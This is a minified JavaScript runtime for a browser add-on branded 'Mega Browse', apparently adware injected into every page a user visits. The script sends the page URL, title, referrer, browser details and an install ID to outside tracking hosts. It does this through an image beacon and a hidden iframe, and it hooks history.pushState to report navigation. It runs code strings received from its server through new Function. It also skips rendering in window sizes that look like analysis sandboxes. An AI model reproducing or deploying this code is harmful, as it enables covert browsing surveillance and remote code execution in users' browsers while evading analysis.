(function(){function z(b,a,c){if(b instanceof Array){if("undefined"!=typeof Array.prototype.indexOf)return b.indexOf(a,c);c=c||0;var d=b.length;if(c>=d)return-1;for(0>c&&(c=Math.max(d+c,0));c<d;c++)if(b[c]===a)return c}return-1}function G(){for(var b=0;b<H.length;b++){var a=H[b].exec(navigator.userAgent);if(a)return b=a.splice(1,2),2>b.length&&b.push("0"),b}return["Unknown","0"]}function Q(b){var a={rawName:"Unknown",rawVersion:"0",name:"Unknown",version:"0"};if(!1==!!b||2>b.length)return a;a.name=
a.rawName=b[0];a.version=a.rawVersion=b[1];b=a.version.indexOf(".");-1!==b&&(a.version=a.version.substring(0,b));b=a.rawName.toLowerCase();switch(b){case "mrchrome":a.name="Amigo";break;case "opr":a.name="Opera";break;case "yabrowser":a.name="Yandex";break;case "ir":a.name="Rocket"}0==b.indexOf("msie")?a.name="MSIE":0==b.indexOf("trident")&&(a.name="MSIE",a.version="11");return a}function s(b,a){if(b.constructor){var c=b.constructor.prototype[a],d=typeof c;if("function"==d||k&&9>k&&"object"==d)return function(){return c.apply(b,
arguments)}}if(k&&8>k&&b===e)try{return eval(R.join(a))}catch(h){}return b[a]}function r(b,a){var c=g.createElement("script");c.type="text/javascript";c.src=b;c.onload=c.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||"complete"==this.readyState){c.onload=c.onreadystatechange=null;c.parentNode.removeChild(c);try{"function"==typeof a&&a()}catch(b){}}};(g.body||g.head).appendChild(c)}function S(b,a,c){var d=m+1E20*Math.random();e[d]=c;r(b+(0<b.indexOf("?")?"&":"?")+a+"="+
d,function(){try{delete e[d]}catch(a){}})}function A(b,a){for(var c={},d=b.search.substr(1).split("&"),h=0;h<d.length;h++){var e=d[h].split("=");c[decodeURIComponent(e[0])]=2==e.length?decodeURIComponent(e[1]):""}return c[a]}function u(b){for(var a=[],c=0;c<b.length;c++)a.push(encodeURIComponent(b[c].toString().replace(/,/g,"$cma;")));g.images&&((new Image).src=T+a.shift()+"="+a.join("|,|"))}function U(b){var a;window.history&&(a=window.history,C=a.pushState,a.pushState=function(c){"function"==typeof a.a&&
a.a({state:c});b();return C.apply(a,arguments)})}function v(b,a,c){if(b.addEventListener)return b.addEventListener(a,c,!1);if(b.attachEvent)return b.attachEvent("on"+a,c)}function n(b,a,c){if(b.removeEventListener)return b.removeEventListener(a,c,!1);if(b.detachEvent)return b.detachEvent("on"+a,c)}function V(b){if("function"==typeof I)return I(b);for(var a,c=0,d=w,h="";b.charAt(c|0)||(d="=",c%1);h+=d.charAt(63&a>>8-c%1*8))a=a<<8|b.charCodeAt(c-=-.75);return h}function W(b){for(var a=0,c="";a<b.length;)var d=
parseInt(b.charAt(a++),16)<<8|parseInt(b.charAt(a++),16)<<4|parseInt(b.charAt(a++),16),h=d&63,c=c+w.charAt(d>>6),c=c+w.charAt(h);for(;c.length%4;)c+=w.charAt(64);return c}function X(b){function a(a,d){try{x[b]=d?a+"-"+d:a}catch(h){}}return{abort:function(c){a("abort",c)},exception:function(c){a("exception",c)},success:function(c){a("success",c)}}}function Y(b,a,c,d){var h=X(d);return function(){try{(new Function("client","defaultSettings","customSettings","report",c))(f,b,a,h)}catch(d){h.exception(d)}}}
function J(b){for(var a=0;a<b.length;a++){var c=b[a];K(Y(c.defaultSettings,c.customSettings,c.init,c.id),0)}}function D(){n(e,"unload",D);var b;window.history&&(b=window.history,b.pushState=C);if(!(.1<Math.random())){b=[];for(var a in x)x.hasOwnProperty(a)&&b.push(a+":"+x[a]);a=f.geo&&"string"==typeof f.geo.countryCode?f.geo.countryCode.toLowerCase():"";b=["InitState",f.guid,g.location.host,g.location.href].concat(G(),a,f.urlCategories?f.urlCategories.join("|"):"",b.join("|"),(new Date).getTime());
u(b)}}function L(){for(var b=!0,a="none",c=g.getElementsByTagName("script"),d=0;d<c.length;d++)if(-1<c[d].src.indexOf(Z+"/gsrs")){var h=g.createElement("a");h.href=c[d].src;f.guid=A(h,"g");f.installSource=A(h,"is");p=A(h,"bp");if(!1==!!g.getElementById(p+m)){b=!1;a=p+m;break}}if(!0==b)n(e,"message",M);else{u(["Runtime_Ran",m,f.guid||"00000000-0000-0000-0000-000000000000",p.substr(0,1E3),f.browser.name.substr(0,1E3),f.browser.version.substr(0,1E3)]);a:for(b=g.title||"",c=0;c<N.length;c++)if(N[c].test(b)){b=
"";break a}b=b.substr(0,1E3);if(706==e.innerHeight&&1024==e.innerWidth&&0==e.screenX&&0==e.screenY||697==e.innerHeight&&1024==e.innerWidth&&-8==e.screenX&&-8==e.screenY)return u(["SkippedRender_1",f.guid||"",m,b,e.location.href.substr(0,4E3),"Platform"]);l=g.createElement("iframe");l.id=a;l.style.width="1px";l.style.height="1px";l.style.display="none";l.src="https:"+O+"/gscf?n="+encodeURIComponent((e.name||"").substr(0,1E3))+"&t="+encodeURIComponent(b)+"&r="+encodeURIComponent((g.referrer||"").substr(0,
4E3))+"&g="+encodeURIComponent(f.guid||"")+"&is="+encodeURIComponent(f.installSource||"")+"&bp="+encodeURIComponent(p||"BF");g.body.appendChild(l)}}function M(b){try{var a=b.data;"string"==typeof a&&(a=q.parse(a));if(a.ext&&a.ext==m){if(l&&b.source==l.contentWindow)if("userdata"==a.msg&&a.installSource&&a.appData){f.installSource=a.installSource;f.ip=a.ip;f.geo=a.geo;f.bid=a.bucketId;f.token=a.token;E=a.appData;for(var c=0;c<E.length;c++){var d=E[c];d.id==$&&(f.tc=!0);(d.blacklistCategories.length||
d.whitelistCategories.length||!d.skipUrlCategorization?y:F).push(d)}F.length&&J(F);y.length&&(c={ext:m,msg:"getcategory"},l.contentWindow.postMessage(!k||9<k?c:q.stringify(c),"*"));v(e,"unload",D);U(D)}else if("category"==a.msg&&a.categoryData){f.urlCategories=a.categoryData.categories;f.isBadCategory=a.categoryData.isBadCategory;f.isBadUrl=a.categoryData.isBadUrl;f.isBadUrlCategory=f.isBadCategory||f.isBadUrl;for(var c=a.categoryData.categories,d=[],h=0;h<y.length;h++){var B=y[h],g;a:{for(var r=
c,n=B.blacklistCategories,p=B.whitelistCategories,t=0;t<p.length;t++)if(-1<z(r,p[t])){g=!0;break a}for(t=0;t<n.length;t++)if(-1<z(r,n[t])){g=!1;break a}g=!p.length||!!n.length}g&&d.push(B)}d.length&&J(d)}if(b.source==e)if("getguid"==a.msg){var s={ext:m,msg:"guid",guid:f.guid,bf:!0};P(!k||9<k?s:q.stringify(s),"*")}else"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&l.contentWindow.postMessage(!k||9<k?a:q.stringify(a),"https:"+O)}}catch(u){}}var e=window,l,g=document,q,k=
!1,m="Mega Browse",O="//api.megabrowse.biz",Z="//apimegabrowsebiz-a.akamaihd.net",E,p,T="//jsl.infostatsvc.com/?",w="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",R=["(function () {delete ","; return ",";})()"],C,H=[/\b(IR)\/([\d\.]+)\b/i,/\b(opr)\/([\d\.]+)\b/i,/\b(lunascape)[\/ ]([\d\.]+)\b/i,/\b(maxthon)\/([\d\.]+)\b/i,/\b(yabrowser)\/([\d\.]+)\b/i,/\b(mrchrome)\b/i,/\b(chrome)\/([\d\.]+)\b/i,/\b(msie)\s([\d\.]+)\b/i,/\b(trident)\/([\d\.]+)\b/i,
/\b(firefox)\/([\d\.]+)\b/i,/\b(safari)\/([\d\.]+)\b/i,/\b(opera)\/([\d\.]+)\b/i],$="1065";if(e.top==e){var y=[],F=[],x={},N=[/\b(?:\d[(). -]*?){9,16}\b/,/\b[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\b/i],K=s(e,"setTimeout"),I=s(e,"btoa"),P=s(e,"postMessage"),f=function(){function b(){n(g,"DOMContentLoaded",b);for(n(e,"load",b);a.length;)K(a.pop(),0)}var a=[],c={},d=G();return{productName:m,webDomain:"megabrowse.biz",
webCdnDomain:"wwwmegabrowsebiz-a.akamaihd.net",es:"2",tc:!1,browser:Q(d),utils:{addEventListener:v,arrayIndexOf:z,changeAppState:function(a,c){if("number"==typeof a&&"boolean"==typeof c){var b={ext:m,msg:"statechange",appid:a,state:c};P(!k||9<k?b:q.stringify(b),"*")}},removeEventListener:n,base64EncodeText:V,base64EncodeHex:W,getNativeWindowFunction:s,loadScript:r,loadJSONP:S,log:u,ready:function(c){a.push(c);"complete"==g.readyState?b():(v(g,"DOMContentLoaded",b),v(e,
"load",b))},require:function(a,b,d){switch(a){case "jquery":b=b||"1";c[a]&&c[a][b]?"function"==typeof d&&d(c[a][b]):r("//ajax.googleapis.com/ajax/libs/jquery/"+b+"/jquery.min.js",function(){c[a]=c[a]||{};c[a][b]=e.jQuery.noConflict(!0);"function"==typeof d&&d(c[a][b])});break;case "swfobject":if(b=b||"2",c[a]&&c[a][b])"function"==typeof d&&d(c[a][b]);else{var f=e.swfobject;r("//ajax.googleapis.com/ajax/libs/swfobject/"+b+"/swfobject.js",function(){c[a]=c[a]||{};c[a][b]=e.swfobject;e.swfObject=f;"function"==
typeof d&&d(c[a][b])})}}}},window:{name:e.name},getInstallId:function(){return this.guid},getClientIP:function(){return this.ip}}}();(function(){var b=g.documentMode,a;try{delete g.documentMode,a=g.documentMode,g.documentMode=b}catch(c){}"number"==typeof a?k=a:"number"==typeof b&&(k=b);v(e,"message",M);var d=e.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(q=d,f.utils.JSON=q,f.utils.ready(L)):r("//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js",function(){q=
e.JSON;f.utils.JSON=q;"undefined"!=typeof d&&(e.JSON=d);f.utils.ready(L)})})()}})();
